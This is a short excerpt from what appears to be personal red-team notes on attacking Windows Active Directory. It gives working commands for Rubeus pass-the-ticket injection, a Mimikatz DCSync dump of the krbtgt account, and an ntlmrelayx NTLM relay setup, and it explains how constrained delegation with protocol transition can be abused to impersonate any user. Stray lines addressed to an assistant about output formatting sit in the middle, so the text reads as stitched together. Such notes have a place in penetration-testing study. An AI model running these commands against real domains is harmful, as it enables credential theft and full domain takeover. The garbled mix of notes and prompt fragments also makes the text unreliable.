0xIapetus/RedTeamingNotes/All_About_Windows.md

 `Rubeus.exe ptt /ticket:`
 - **Once the ticket is injected, run DCSync:**
 `Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\krbtgt"'`

-give me the output in one output text ( the black one you usuall use, becuase it's easy for copy and paste).
-This is how i want you to do it :
-- **Setup NTLM relay:**
-  `python3.9 /opt/impacket/examples/ntlmrelayx.py -smb2support -t smb://"OXISERVER1 IP" -debug`

 ## CONSTRAINED DELEGATION
 Constrained Delegation with Protocol Transition means The web service requests a ticket from the Key Distribution Center (KDC) for someones's account without supplying a password, as the websvc account.
 The KDC checks the websvc userAccountControl value for the TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION attribute, and that someones's account is not blocked for delegation.
 To abuse constrained delegation in above scenario, we need to have access to the websvc account.
 If we have access to that account, it is possible to access the services listed in msDS-AllowedToDelegateTo of the websvc account as ANY user.